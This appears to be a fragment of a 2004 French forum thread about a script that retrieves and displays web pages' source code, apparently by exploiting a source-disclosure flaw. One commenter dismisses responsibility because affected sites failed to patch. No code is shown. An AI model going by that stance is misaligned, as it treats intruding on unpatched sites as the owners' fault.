de plus il t enregistre sous le nom code.own donc t source des pages recupéré par le script tu peux soi les telecharger, soi les voir directement via l 'url (voir lien show source) possibilité d affiché les code en couleur
Voir aussi fonction showsource("page") si tu veu t amusé...
Voilou..
18 avril 2004 à 23:04
18 avril 2004 à 22:21
et tempis pour se qu'ils ont cette faille et qu'il ne la securise pas! faute du webmaster et non de la faille...
18 avril 2004 à 19:59
Merci bien !
18 avril 2004 à 15:51